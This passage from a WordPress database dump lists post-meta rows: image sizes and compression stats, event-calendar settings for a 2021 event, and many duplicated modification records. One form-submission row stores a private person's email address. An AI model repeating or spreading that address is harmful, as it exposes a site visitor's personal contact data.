:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132834,263891,'_RTECnumRegistered','0'),(132835,263891,'_EventVenueID','262435'),(132837,263891,'_dp_original','263641'),(132838,263891,'_edit_lock','1614225385:2'),(132839,263891,'_edit_last','2'),(132840,263892,'_wp_attached_file','2021/02/mountain-stone-stream.jpg'),(132841,263892,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:33:\"2021/02/mountain-stone-stream.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"mountain-stone-stream-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"mountain-stone-stream-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"mountain-stone-stream-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144975,265294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:699;s:6:\"height\";i:413;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-5.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-5-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144974,265294,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-5.jpg'),(144973,265285,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:62484;s:12:\"smushed-size\";i:58562;s:15:\"savings-percent\";d:6.28000000000000024868995751603506505489349365234375;}'),(144972,265285,'smush-info','The file was compressed from 61.02 KB to 57.19 KB saving 6.28 percent using WP-Optimize'),(144971,265285,'smush-complete','1'),(144970,265285,'original-file','2021/08/ESC-OCT-2021-divine-creativity-2-updraft-pre-smush-original.jpg'),(150984,265944,'smush-complete','1'),(150985,265944,'smush-info','The file was compressed from 201.40 KB to 194.68 KB saving 3.34 percent using WP-Optimize'),(150986,265944,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:206238;s:12:\"smushed-size\";i:199355;s:15:\"savings-percent\";d:3.339999999999999857891452847979962825775146484375;}'),(132894,263892,'original-file','2021/02/mountain-stone-stream-updraft-pre-smush-original.jpg'),(132895,263892,'smush-complete','1'),(132896,263892,'smush-info','The file was compressed from 61.62 KB to 56.83 KB saving 7.77 percent using WP-Optimize'),(132897,263892,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:63101;s:12:\"smushed-size\";i:58198;s:15:\"savings-percent\";d:7.769999999999999573674358543939888477325439453125;}'),(132898,263890,'original-file','2021/02/email-header-logo-updraft-pre-smush-original.png'),(132899,263890,'smush-complete','1'),(132900,263890,'smush-info','The file was compressed from 11.91 KB to 4.51 KB saving 62.16 percent using WP-Optimize'),(132901,263890,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12200;s:12:\"smushed-size\";i:4617;s:15:\"savings-percent\";d:62.159999999999996589394868351519107818603515625;}'),(151008,265976,'_field_447','Gold'),(151009,265976,'_field_448','trg1122@gmail.com'),(151010,265976,'_form_id','48'),(151011,265976,'_seq_num','11'),(151284,266042,'mec_hide_time','0'),(151285,266042,'mec_hide_end_time','0'),(151286,266042,'mec_comment',''),(151287,266042,'mec_timezone','global'),(151288,266042,'mec_countdown_method','global'),(151289,266042,'mec_public','1'),(151290,266042,'mec_start_date','2022-01-23'),(151291,266042,'mec_start_time_hour','10'),(132928,263901,'protect_children',''),(132929,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132930,263901,'_EventOrigin','events-calendar'),(132931,263901,'protect_children',''),(132932,263901,'protect_children',''),(132933,263901,'protect_children',''),(132934,263901,'protect_children',''),(132935,263901,'protect_children',''),(132936,263901,'protect_children',''),(132937,263901,'protect_children',''),(132938,263901,'protect_children',''),(132939,263901,'protect_children',''),(132940,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132972,263901,'_EventCurrencyPosition','prefix'),(132941,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132971,263901,'_EventCurrencySymbol',''),(132942,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132970,263901,'_EventDuration','3600'),(132973,263901,'_EventCost',''),(132943,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132969,263901,'_EventEndDateUTC','2021-04-15 02:00:00'),(132944,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132968,263901,'_EventStartDateUTC','2021-04-15 01:00:00'),(132974,263901,'_EventURL',''),(132945,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132967,263901,'_EventEndDate','2021-04-14 20:00:00'),(132975,263901,'_EventTimezone','America/Denver'),(132946,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132966,263901,'_EventStartDate','2021-04-14 19:00:00'),(132976,263901,'_EventTimezoneAbbr','MDT'),(132947,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132965,263901,'_EventShowMap',''),(132977,263901,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(132948,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132964,263901,'_EventShowMapLink',''),(132978,263901,'_RTECregistrationsDisabled','1'),(132979,263901,'_RTECdeadlineType','start'),(132949,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132963,263901,'boldgrid_hide_page_title','0'),(132980,263901,'_RTECwhoCanRegister','any'),(132950,263901,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614199014;s:12:\"_EventOrigin\";i:1614199014;s:13:\"_thumbnail_id\";i:1614199400;s:24:\"boldgrid_hide_page_title\";i:1614199014;s:17:\"_EventShowMapLink\";i:1614199014;s:13:\"_EventShowMap\";i:1614199014;s:15:\"_EventStartDate\";i:1614199400;s:13:\"_EventEndDate\";i:1614199400;s:18:\"_EventStartDateUTC\";i:1614199400;s:16:\"_EventEndDateUTC\";i:1614199400;s:14:\"_EventDuration\";i:1614199014;s:20:\"_EventCurrencySymbol\";i:1614199014;s:22:\"_EventCurrencyPosition\";i:1614199014;s:10:\"_EventCost\";i:1614199014;s:9:\"_EventURL\";i:1614199014;s:14:\"_EventTimezone\";i:1614199014;s:18:\"_EventTimezoneAbbr\";i:1614199400;s:27:\"_EventNextPendingRecurrence\";i:1614199014;s:26:\"_RTECregistrationsDisabled\";i:1614199014;s:17:\"_RTECdeadlineType\";i:1614199014;s:19:\"_RTECwhoCanRegister\";i:1614199014;s:23:\"_RTEClimitRegistrations\";i:1614199014;s:21:\"_RTECmaxRegistrations\";i:1614199014;s:16:\"_EventRecurrence\";i:1614199014;s:18:\"_RTECnumRegistered\";i:1614199014;s:13:\"_EventVenueID\";i:1614199014;s:12:\"_dp_original\";i:1614199014;s:10:\"_edit_last\";i:1614199085;s:10:\"post_title\";i:1614199085;s:12:\"post_content\";i:1614199627;s:16:\"tribe_events_cat\";i:1614224827;s:11:\"post_status\";i:1614199400;}'),(132952,263901,'_EventOrigin','events-calendar'),(132953,263901,'_EventOrigin','events-calendar'),(132954,263901,'_EventOrigin','events-calendar'),(132955,263901,'_EventOrigin','events-calendar'),(132956,263901,'_EventOrigin','events-calendar'),(132957,263901,'_EventOrigin','events-calendar'),(132958,263901,'_EventOrigin','events-calendar'),(132959,263901,'_EventOrigin','events-calendar'),(132960,263901,'_EventOrigin','events-calendar'),(132961,263901,'_EventOrigin','events-calendar'),(132962,263901,'_thumbnail_id','263902'),(132951,263901,'_EventOrigin','events-calendar'),(132981,263901,'_RTEClimitRegistrations','0'),(132982,263901,'_RTECmaxRegistrations','30'),(132983,263901,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132984,263901,'_RTECnumRegistered','0'),(132985,263901,'_EventVenueID','262435'),(132987,263901,'_dp_original','263641'),(132988,263901,'_edit_lock','1614224732:2'),(132989,263901,'_edit_last','2'),(132990,263902,'_wp_attached_file','2021/02/heart-in-hand.jpg'),(132991,263902,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:472;s:6:\"height\";i:265;s:4:\"file\";s:25:\"2021/02/heart-in-hand.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"heart-in-hand-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"heart-in-hand-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"heart-in-hand-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151283,266042,'one_occurrence','0'),(133057,263902,'original-file','2021/02/heart-in-hand-updraft-pre-smush-original.jpg'),(133058,263902,'smush-complete','1'),(133059,263902,'smush-info','The file was compressed from 17.08 KB to 16.51 KB saving 3.34 percent using WP-Optimize'),(133060,263902,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17490;s:12:\"smushed-size\";i:16906;s:15:\"savings-percent\";d:3.339999999999999857891452847979962825775146484375;}'),(161188,266634,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:27:\"2022/05/JewelsOfWisdom.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"JewelsOfWisdom-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"JewelsOfWisdom-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"JewelsOfWisdom-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"JewelsOfWisdom-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/w